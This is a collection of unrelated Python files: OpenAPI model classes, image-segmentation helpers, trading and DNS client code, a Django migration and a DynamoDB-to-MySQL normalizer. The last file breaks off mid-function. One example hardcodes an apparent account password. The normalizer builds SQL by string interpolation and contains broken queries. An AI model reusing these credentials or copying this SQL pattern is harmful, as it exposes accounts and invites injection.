@currency_pair.setter
def currency_pair(self, currency_pair):
"""Sets the currency_pair of this MarginAccountBook.
Account currency pair # noqa: E501
:param currency_pair: The currency_pair of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency_pair = currency_pair
@property
def change(self):
"""Gets the change of this MarginAccountBook. # noqa: E501
Amount changed. Positive value means transferring in, while negative out # noqa: E501
:return: The change of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._change
@change.setter
def change(self, change):
"""Sets the change of this MarginAccountBook.
Amount changed. Positive value means transferring in, while negative out # noqa: E501
:param change: The change of this MarginAccountBook. # noqa: E501
:type: str
"""
self._change = change
@property
def balance(self):
"""Gets the balance of this MarginAccountBook. # noqa: E501
Balance after change # noqa: E501
:return: The balance of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._balance
@balance.setter
def balance(self, balance):
"""Sets the balance of this MarginAccountBook.
Balance after change # noqa: E501
:param balance: The balance of this MarginAccountBook. # noqa: E501
:type: str
"""
self._balance = balance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MarginAccountBook):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, MarginAccountBook):
return True
return self.to_dict() != other.to_dict()
|
def spam():
pass # Unicode test: Ã after.
def eggs():
pass
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_identifier8
except ImportError:
btp_identifier8 = sys.modules["onshape_client.oas.models.btp_identifier8"]
try:
from onshape_client.oas.models import btp_module_id235
except ImportError:
btp_module_id235 = sys.modules["onshape_client.oas.models.btp_module_id235"]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
class BTPTopLevelImport285AllOf(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"combined_namespace_path_and_version": (str,), # noqa: E501
"import_microversion": (str,), # noqa: E501
"module_id": (btp_module_id235.BTPModuleId235,), # noqa: E501
"namespace": ([btp_identifier8.BTPIdentifier8],), # noqa: E501
"namespace_string": (str,), # noqa: E501
"space_before_import": (btp_space10.BTPSpace10,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"combined_namespace_path_and_version": "combinedNamespacePathAndVersion", # noqa: E501
"import_microversion": "importMicroversion", # noqa: E501
"module_id": "moduleId", # noqa: E501
"namespace": "namespace", # noqa: E501
"namespace_string": "namespaceString", # noqa: E501
"space_before_import": "spaceBeforeImport", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_top_level_import285_all_of.BTPTopLevelImport285AllOf - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
combined_namespace_path_and_version (str): [optional] # noqa: E501
import_microversion (str): [optional] # noqa: E501
module_id (btp_module_id235.BTPModuleId235): [optional] # noqa: E501
namespace ([btp_identifier8.BTPIdentifier8]): [optional] # noqa: E501
namespace_string (str): [optional] # noqa: E501
space_before_import (btp_space10.BTPSpace10): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
import os
from PIL import Image
import numpy as np
def get_files(folder, name_filter=None, extension_filter=None):
"""Helper function that returns the list of files in a specified folder
with a specified extension.
Keyword arguments:
- folder (``string``): The path to a folder.
- name_filter (```string``, optional): The returned files must contain
this substring in their filename. Default: None; files are not filtered.
- extension_filter (``string``, optional): The desired file extension.
Default: None; files are not filtered
"""
if not os.path.isdir(folder):
raise RuntimeError("\"{0}\" is not a folder.".format(folder))
# Filename filter: if not specified don't filter (condition always true);
# otherwise, use a lambda expression to filter out files that do not
# contain "name_filter"
if name_filter is None:
# This looks hackish...there is probably a better way
name_cond = lambda filename: True
else:
name_cond = lambda filename: name_filter in filename
# Extension filter: if not specified don't filter (condition always true);
# otherwise, use a lambda expression to filter out files whose extension
# is not "extension_filter"
if extension_filter is None:
# This looks hackish...there is probably a better way
ext_cond = lambda filename: True
else:
ext_cond = lambda filename: filename.endswith(extension_filter)
filtered_files = []
# Explore the directory tree to get files that contain "name_filter" and
# with extension "extension_filter"
for path, _, files in os.walk(folder):
files.sort()
for file in files:
if name_cond(file) and ext_cond(file):
full_path = os.path.join(path, file)
filtered_files.append(full_path)
return filtered_files
def pil_loader(data_path, label_path):
"""Loads a sample and label image given their path as PIL images.
Keyword arguments:
- data_path (``string``): The filepath to the image.
- label_path (``string``): The filepath to the ground-truth image.
Returns the image and the label as PIL images.
"""
data = Image.open(data_path)
label = Image.open(label_path)
return data, label
def remap(image, old_values, new_values):
assert isinstance(image, Image.Image) or isinstance(
image, np.ndarray), "image must be of type PIL.Image or numpy.ndarray"
assert type(new_values) is tuple, "new_values must be of type tuple"
assert type(old_values) is tuple, "old_values must be of type tuple"
assert len(new_values) == len(
old_values), "new_values and old_values must have the same length"
# If image is a PIL.Image convert it to a numpy array
if isinstance(image, Image.Image):
image = np.array(image)
# Replace old values by the new ones
tmp = np.zeros_like(image)
for old, new in zip(old_values, new_values):
# Since tmp is already initialized as zeros we can skip new values
# equal to 0
if new != 0:
tmp[image == old] = new
return Image.fromarray(tmp)
def enet_weighing(dataloader, num_classes, c=1.02):
"""Computes class weights as described in the ENet paper:
w_class = 1 / (ln(c + p_class)),
where c is usually 1.02 and p_class is the propensity score of that
class:
propensity_score = freq_class / total_pixels.
References: https://arxiv.org/abs/1606.02147
Keyword arguments:
- dataloader (``data.Dataloader``): A data loader to iterate over the
dataset.
- num_classes (``int``): The number of classes.
- c (``int``, optional): AN additional hyper-parameter which restricts
the interval of values for the weights. Default: 1.02.
"""
class_count = 0
total = 0
for _, label in dataloader:
label = label.cpu().numpy()
# Flatten label
flat_label = label.flatten()
# Sum up the number of pixels of each class and the total pixel
# counts for each label
class_count += np.bincount(flat_label, minlength=num_classes)
total += flat_label.size
# Compute propensity score and then the weights for each class
propensity_score = class_count / total
class_weights = 1 / (np.log(c + propensity_score))
return class_weights
def median_freq_balancing(dataloader, num_classes):
"""Computes class weights using median frequency balancing as described
in https://arxiv.org/abs/1411.4734:
w_class = median_freq / freq_class,
where freq_class is the number of pixels of a given class divided by
the total number of pixels in images where that class is present, and
median_freq is the median of freq_class.
Keyword arguments:
- dataloader (``data.Dataloader``): A data loader to iterate over the
dataset.
whose weights are going to be computed.
- num_classes (``int``): The number of classes
"""
class_count = 0
total = 0
for _, label in dataloader:
label = label.cpu().numpy()
# Flatten label
flat_label = label.flatten()
# Sum up the class frequencies
bincount = np.bincount(flat_label, minlength=num_classes)
# Create of mask of classes that exist in the label
mask = bincount > 0
# Multiply the mask by the pixel count. The resulting array has
# one element for each class. The value is either 0 (if the class
# does not exist in the label) or equal to the pixel count (if
# the class exists in the label)
total += mask * flat_label.size
# Sum up the number of pixels found for each class
class_count += bincount
# Compute the frequency and its median
freq = class_count / total
med = np.median(freq)
return med / freq
|
# -*- coding: utf-8 -*-
__author__ = 'pengg'
from datetime import date
from tqsdk import TqApi, TqAuth, TqReplay
'''
复盘模式示例: 指定日期行情完全复盘
复盘 2020-05-26 行情
'''
# 在创建 api 实例时传入 TqReplay 就会进入复盘模式
api = TqApi(backtest=TqReplay(date(2020, 10, 15)), auth=TqAuth("aimoons", "112411"))
quote = api.get_quote("SHFE.cu2101")
while True:
api.wait_update()
if api.is_changing(quote):
print("最新价", quote.datetime, quote.last_price)
|
#!/usr/bin/env python
import ast
import re
from setuptools import setup, find_packages
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('pipeline_live/_version.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
with open('README.md') as readme_file:
README = readme_file.read()
setup(
name='pipeline-live',
version=version,
description='Zipline Pipeline extension for live trade',
long_description=README,
long_description_content_type='text/markdown',
author='Alpaca',
author_email='oss@alpaca.markets',
url='https://github.com/alpacahq/pipeline_live',
keywords='financial,zipline,pipeline,stock,screening,api,trade',
packages=find_packages(),
install_requires=[
'alpaca-trade-api>=0.29',
'iexfinance>=0.4.1',
'zipline==1.3.0',
'numpy==1.16.1',
],
tests_require=[
'pytest',
'pytest-cov',
'flake8',
],
setup_requires=['pytest-runner', 'flake8'],
)
|
import pytest
from dolib.client import AsyncClient, Client
from dolib.models import Domain
@pytest.mark.vcr
@pytest.mark.block_network()
def test_crud_domains(client: Client) -> None:
domain = Domain(name="test.dolib.io")
# create domain
created_domain = client.domains.create(domain=domain)
assert created_domain.name == "test.dolib.io"
# read domain
read_domain = client.domains.get(name=domain.name)
assert read_domain.name == domain.name
assert read_domain.ttl > 0
assert len(read_domain.zone_file) > 0
# list domains
domains = client.domains.all()
assert len(domains) > 0
# create domain record
record = Domain.Record(type="A", name="@", data="8.8.8.8")
record = client.domains.create_record(name=domain.name, record=record)
assert record.id > 0
assert record.ttl == 1800
# update domain record
record.name = "test"
record.ttl = 60
record = client.domains.update_record(name=domain.name, record=record)
assert record.ttl == 60
assert record.name == "test"
# read domain records
records = client.domains.records(name=domain.name)
len_records = len(records)
assert len_records > 0
filtered_records = client.domains.records(
name=domain.name, record_name="test.test.dolib.io", record_type="A"
)
assert len(filtered_records) == 1
# delete domain record
client.domains.delete_record(name=domain.name, record=record)
# delete domain
client.domains.delete(domain=created_domain)
@pytest.mark.vcr
@pytest.mark.block_network()
@pytest.mark.asyncio
async def test_async_crud_domains(async_client: AsyncClient) -> None:
domain = Domain(name="test.dolib.io")
# create domain
created_domain = await async_client.domains.create(domain=domain)
assert created_domain.name == "test.dolib.io"
# read domain
read_domain = await async_client.domains.get(name=domain.name)
assert read_domain.name == domain.name
assert read_domain.ttl > 0
assert len(read_domain.zone_file) > 0
# list domains
domains = await async_client.domains.all()
assert len(domains) > 0
# create domain record
record = Domain.Record(type="A", name="@", data="8.8.8.8")
record = await async_client.domains.create_record(name=domain.name, record=record)
assert record.id > 0
assert record.ttl == 1800
# update domain record
record.name = "test"
record.ttl = 60
record = await async_client.domains.update_record(name=domain.name, record=record)
assert record.ttl == 60
assert record.name == "test"
# read domain records
records = await async_client.domains.records(name=domain.name)
len_records = len(records)
assert len_records > 0
filtered_records = await async_client.domains.records(
name=domain.name, record_name="test.test.dolib.io", record_type="A"
)
assert len(filtered_records) == 1
# delete domain record
await async_client.domains.delete_record(name=domain.name, record=record)
# delete domain
await async_client.domains.delete(domain=created_domain)
|
import logging
from django.db import transaction
from wagtail.wagtailcore.models import Page, Site
from v1.models import BrowsePage, LandingPage, SublandingPage
from v1.tests.wagtail_pages.helpers import save_new_page
logger = logging.getLogger(__name__)
@transaction.atomic
def run():
default_site = Site.objects.get(is_default_site=True)
root_page = default_site.root_page
try:
about_us = Page.objects.get(slug='about-us')
except Page.DoesNotExist:
logger.info('Creating page: About Us')
about_us = LandingPage(title='About Us', slug='about-us', live=False)
save_new_page(about_us, root=root_page)
try:
careers = Page.objects.get(slug='careers')
except Page.DoesNotExist:
logger.info('Creating page: Careers')
careers = SublandingPage(title='Careers', slug='careers', live=False)
save_new_page(careers, root=about_us)
child_pages = [
('Working at the CFPB', 'working-at-cfpb'),
('Job Application Process', 'application-process'),
('Students and Graduates', 'students-and-graduates'),
('Current Openings', 'current-openings'),
]
for title, slug in child_pages:
try:
child_page = Page.objects.get(slug=slug)
except Page.DoesNotExist:
logger.info('Creating page: {}'.format(title))
child_page = BrowsePage(title=title, slug=slug, live=False)
save_new_page(child_page, careers)
if '__main__' == __name__:
run()
|
"""Defines a Request Forward Message."""
# System imports
from enum import IntEnum
# Local source tree imports
from pyof.foundation.base import GenericMessage
from pyof.v0x05.common.header import Header,Type
# Enums
class RequestForwardReason(IntEnum):
"""
Request Forward Reason
"""
#: Forward Group Mod requests
OFPRFR_GROUP_MOD = 0
#: Forward meter mod requests
OFPRFR_METER_MOD = 1
# Classes
class RequestForwardHeader(GenericMessage):
"""Ofp Request Forward Header"""
#: Type OFPT_REQUESTFORWARD
header = Header(message_type=Type.OFPT_REQUESTFORWARD)
#: Request being forwarded
request = Header()
|
#!/usr/bin/python3
import json,datetime,time,argparse,logging,sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), "libs"))
from boto3.dynamodb.conditions import Attr
import general_storage,sqs,utils,query,general_storage_mysql
from progress.bar import Bar
from pprint import pprint
class Normalizer():
## Normalizer class hold data and configurations for normalizing source/target pairs
## source(input) of normalization
source={}
## target(output) of normalization
target={}
## mapping from target key to source key or lambda function
target_source_rule={}
def set_source(self,source):
self.source=source
def set_target(self,target):
self.target=target
def get_source_value(self,s):
## get value from source with key s or lambda function s
mapping=self.target_source_rule[s]
if isinstance(mapping,str):
## if mapping is a string key
return self.source.get(mapping)
else:
## if mapping is lambda function
return mapping(self)
def get_info(self,item):
## get info field
author = self.get_author(item)
return utils.fix_data_to_string({
"created_time" : item["created_time"],
"message":item['message'],
"from" : author
})
def get_author(self,item):
## get author field
return utils.fix_data_to_string({"id":item["user_id"],
"name":item.get("user_name","unknown"),
"profile_picture_url":item['original_data'].get("user",{}).get("profile_image_url_https","")})
def normalize_source_to_target(self,cf,source):
## Normalizing from source obect to target object
self.set_source(source)
if self.source:
for s in self.target_source_rule:
self.target[s] = self.get_source_value(s)
else:
print("No source specified")
class Normalizer_post_dynomodb_mysql(Normalizer):
## Normalizer class for post from dynamodb to mysql
name="posts"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'post_id':'object_id',
'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
class Normalizer_comment_dynomodb_mysql(Normalizer):
## Normalizer class for comment from dynamodb to mysql
name="comments"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'message':'message',
'post_id':'post_id',
'comment_id':'object_id',
#'parent_id':'post_id',
#'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
def insert_dynamodb_item_into_mysql(cf,i):
## Main function to call normalizer to normalize object from dynamodb object to mysql object, and then insert normalized item to mysql database
if i['object_type']=='post':
nl = Normalizer_post_dynomodb_mysql()
else:
nl = Normalizer_comment_dynomodb_mysql()
nl.normalize_source_to_target(cf,i)
connection = general_storage_mysql.create_connection(cf)
attributes,values = general_storage_mysql.simple_json_to_mysql_query(nl.target)
query="insert into twit_%s_%s(%s) values(%s)" %(nl.name,cf.client_short_name,attributes,values)
print(query)
general_storage_mysql.execute_query(connection,query)
def delete_mysql_item(cf,i):
## Main function to call deleteitem to mysql database
if i['object_type']=='post':
query="delete from twit_posts_%s(%s) where post_id=%s" %(cf.client_short_name,i['object_id'])
else:
query="delete from twit_comments_%s(%s) where comment_id=%s" %(cf.client_short_name,i['object_id'])
connection = general_storage_mysql.create_connection(cf)
general_storage_mysql.execute_query(connection,query)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Normalizer for twitter between DynamoDB and mysql')
parser.add_argument('config', type=str, help='an config file for normalizer')
parser.add_argument('--query', type=str, default=None, help='query to get data for normalizer')
parser.add_argument('--type', type=str, default="own", help='general or own. general:get everything using query; own:get own post and all replies')
args = parser.parse_args()
config = __import__(args.config)
cf =config.Config()
if args.type=="own":
query_str = args.query
if query_str:
query_str = query_str + " AND user_id:%s AND object_type:post" %(cf.twitter_user_id)
else:
query_str="user_id:%s AND object_type:post" %(cf.twitter_user_id)
total,posts = query.query_items(cf,query_str)
if total>0:
for post_id in [x["id"] for x in posts]:
post_with_comments=general_storage.get_item_and_comments(cf,post_id)
#print("%s comments" %(len(post_with_comments["comments"])))
insert_dynamodb_item_into_mysql(cf,post_with_comments["item"])
for comment in post_with_comments["comments"]:
insert_dynamodb_item_into_mysql(cf,comment)
elif args.type=="general":
#utils.run_until_finish(lambda: utils.process_sqs_rerun(cf,queue_name,process_clara,cf.clara_batch_size))
db_items=general_storage.get_items_by_ids(cf,query.es_outputs_to_ids(items))
for i in db_items:
insert_dynamodb_item_into_mysql(cf,i)
|
"""
Png to Ico
"""
import toga
from toga.style import Pack
from toga.style.pack import COLUMN, ROW
from PIL import Image
import random
import os
class Png2Ico(toga.App):
def startup(self):
self.msg = '请开始操作'
main_box = toga.Box(style=Pack(direction=COLUMN))
img_path_box = toga.Box(style=Pack(direction=ROW))
labelPath = toga.Label(
'请选择文件',
style=Pack(padding=(5, 5))
)
self.labelMsg = toga.Label(
self.msg,
style=Pack(padding=(5, 5))
)
buttonDir = toga.Button(
'选择图像',
on_press=self.select_png,
style=Pack(padding=5)
)
buttonExec = toga.Button(
'执行转换',
on_press=self.png_to_ico,
style=Pack(padding=5)
)
self.dirInput = toga.TextInput(style=Pack(flex=1), readonly=True)
img_path_box.add(labelPath)
img_path_box.add(buttonDir)
img_path_box.add(self.dirInput)
main_box.add(img_path_box)
main_box.add(self.labelMsg)
main_box.add(buttonExec)
self.main_window = toga.MainWindow(title=self.formal_name)
self.main_window.content = main_box
self.main_window.show()
def select_png(self, widget):
try:
pngPath_ = self.main_window.open_file_dialog(
'请选择png图片', file_types="(*.png)|*.png")
if pngPath_:
if pngPath_.split('.').pop() == 'png':
self.pngPath = pngPath_
self.msg = '已成功选择图片!转换后将保存到相同目录!'
else:
self.msg = '请选择png格式的图片!'
self.pngPath = ''
except Exception as e:
self.pngPath = ''
self.labelMsg.text = self.msg
self.dirInput.value = self.pngPath
def png_to_ico(self, widget):
try:
self.pngPath
goOn = 1
if self.dirInput.value == self.pngPath:
goOn = 1
else:
goOn = 0
except Exception:
goOn = 0
if goOn and os.path.exists(self.pngPath):
if self.pngPath:
preList_ = self.pngPath.split('\\')
preList_.pop()
self.saveDir = '\\'.join(preList_)+'\\'
self.msg = '成功选择存储路径,转换中...'
goOn = 1
else:
self.msg = '存储路径不存在'
goOn = 0
self.labelMsg.text = self.msg
if goOn == 1:
toIco = Image.open(self.pngPath)
toIco.save(self.saveDir+'transfromed' +
str(random.randint(10000, 99999)) + '.ico')
self.msg = '转换成功!'
else:
pass
else:
self.msg = '操作路径不存在,请重新选择!'
self.labelMsg.text = self.msg
def main():
return Png2Ico()
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.DYU/Sun-ExtA_16/udhr_Latn.DYU_Sun-ExtA_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('choice', models.CharField(max_length=256, verbose_name='valg')),
],
options={
'permissions': (('view_choice', 'View Choice'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Feedback',
fields=[
('feedback_id', models.AutoField(serialize=False, primary_key=True)),
('description', models.CharField(max_length=100, verbose_name='beskrivelse')),
('display_field_of_study', models.BooleanField(default=True, help_text='Grafen over studiefelt vil bli vist til bedriften', verbose_name='Vis studie oversikt')),
('display_info', models.BooleanField(default=True, help_text='En boks med ekstra informasjon vil bli vist til bedriften', verbose_name='Vis extra informasjon')),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'tilbakemeldingsskjema',
'verbose_name_plural': 'tilbakemeldingsskjemaer',
'permissions': (('view_feedback', 'View Feedback'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='FeedbackRelation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField()),
('deadline', models.DateField(verbose_name='Tidsfrist')),
('gives_mark', models.BooleanField(default=True, help_text='Gir automatisk prikk til brukere som ikke har svart innen fristen', verbose_name='Gir Prikk')),
('active', models.BooleanField(default=True)),
('created_date', models.DateTimeField(auto_now_add=True)),
('first_mail_sent', models.BooleanField(default=False)),
('answered', models.ManyToManyField(related_name='feedbacks', null=True, to=settings.AUTH_USER_MODEL, blank=True)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
('feedback', models.ForeignKey(verbose_name='Tilbakemeldingskjema', to='feedback.Feedback')),
],
options={
'verbose_name': 'tilbakemelding',
'verbose_name_plural': 'tilbakemeldinger',
'permissions': (('view_feedbackrelation', 'View FeedbackRelation'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='FieldOfStudyAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.SmallIntegerField(verbose_name='Studieretning', choices=[(0, 'Gjest'), (1, 'Bachelor i Informatikk (BIT)'), (10, 'Software (SW)'), (11, 'Informasjonsforvaltning (DIF)'), (12, 'Komplekse Datasystemer (KDS)'), (13, 'Spillteknologi (SPT)'), (14, 'Intelligente Systemer (IRS)'), (15, 'Helseinformatikk (MSMEDTEK)'), (30, 'Annen mastergrad'), (80, 'PhD'), (90, 'International'), (100, 'Annet Onlinemedlem')])),
('feedback_relation', models.ForeignKey(related_name='field_of_study_answers', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_fieldofstudyanswer', 'View FieldOfStudyAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MultipleChoiceAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.CharField(max_length=256, verbose_name='svar')),
('feedback_relation', models.ForeignKey(related_name='multiple_choice_answers', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_multiplechoiceanswer', 'View MultipleChoiceAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MultipleChoiceQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('label', models.CharField(max_length=256, verbose_name='Sp\xf8rsm\xe5l')),
],
options={
'permissions': (('view_multiplechoicequestion', 'View MultipleChoiceQuestion'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MultipleChoiceRelation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order', models.SmallIntegerField(default=30, verbose_name='Rekkef\xf8lge')),
('display', models.BooleanField(default=True, verbose_name='Vis til bedrift')),
('feedback', models.ForeignKey(related_name='multiple_choice_questions', to='feedback.Feedback')),
('multiple_choice_relation', models.ForeignKey(to='feedback.MultipleChoiceQuestion')),
],
options={
'permissions': (('view_multiplechoicerelation', 'View MultipleChoiceRelation'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RatingAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.SmallIntegerField(default=0, verbose_name='karakter', choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6')])),
('feedback_relation', models.ForeignKey(related_name='rating_answers', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_ratinganswer', 'View RatingAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RatingQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order', models.SmallIntegerField(default=20, verbose_name='Rekkef\xf8lge')),
('label', models.CharField(max_length=256, verbose_name='Sp\xf8rsm\xe5l')),
('display', models.BooleanField(default=True, verbose_name='Vis til bedrift')),
('feedback', models.ForeignKey(related_name='rating_questions', to='feedback.Feedback')),
],
options={
'permissions': (('view_ratingquestion', 'View RatingQuestion'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RegisterToken',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('token', models.CharField(max_length=32, verbose_name='token')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='opprettet dato')),
('fbr', models.ForeignKey(related_name='Feedback_relation', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_feedbackregistertoken', 'View FeedbackRegisterToken'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TextAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.TextField(verbose_name='svar')),
('feedback_relation', models.ForeignKey(related_name='text_answers', to='feedback.FeedbackRelation')),
],
options={
'permissions': (('view_textanswer', 'View TextAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TextQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order', models.SmallIntegerField(default=10, verbose_name='Rekkef\xf8lge')),
('label', models.CharField(max_length=256, verbose_name='Sp\xf8rsm\xe5l')),
('display', models.BooleanField(default=True, verbose_name='Vis til bedrift')),
('feedback', models.ForeignKey(related_name='text_questions', to='feedback.Feedback')),
],
options={
'permissions': (('view_textquestion', 'View TextQuestion'),),
},
bases=(models.Model,),
),
migrations.AddField(
model_name='textanswer',
name='question',
field=models.ForeignKey(related_name='answer', to='feedback.TextQuestion'),
preserve_default=True,
),
migrations.AddField(
model_name='ratinganswer',
name='question',
field=models.ForeignKey(related_name='answer', to='feedback.RatingQuestion'),
preserve_default=True,
),
migrations.AddField(
model_name='multiplechoiceanswer',
name='question',
field=models.ForeignKey(related_name='answer', to='feedback.MultipleChoiceRelation'),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='feedbackrelation',
unique_together=set([('feedback', 'content_type', 'object_id')]),
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(related_name='choices', to='feedback.MultipleChoiceQuestion'),
preserve_default=True,
),
]
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from copy import deepcopy
from compas.geometry import cross_vectors
from compas.geometry import length_vector
from compas.geometry import centroid_points
from compas.geometry import norm_vector
from compas_tna.equilibrium._alglib._core import xalglib
__all__ = ['vertical_from_q_alglib']
def vertical_from_q_alglib(form, scale=1.0, density=1.0, kmax=100, tol=1e-3):
""""""
key_index = form.key_index()
xyz = form.vertices_attributes('xyz')
loads = form.vertices_attributes(('px', 'py', 'pz'))
n = form.number_of_vertices()
fixed = list(set(list(form.anchors()) + list(form.fixed())))
free = list(set(range(n)) - set(fixed))
ni = len(free)
nf = len(fixed)
xyzf = [xyz[i] for i in fixed]
selfweight = selfweight_calculator(form, density=density)
adjacency = {}
for key in form.vertices():
nbrs = form.vertex_neighbors(key)
adj = [key_index[nbr] for nbr in nbrs if form.edge_attribute((key, nbr), '_is_edge')]
adjacency[key_index[key]] = adj
ij_q = {uv: scale * form.edge_attribute(uv, 'q', 1.0) for uv in form.edges_where({'_is_edge': True})}
ij_q.update({(v, u): q for (u, v), q in ij_q.items()})
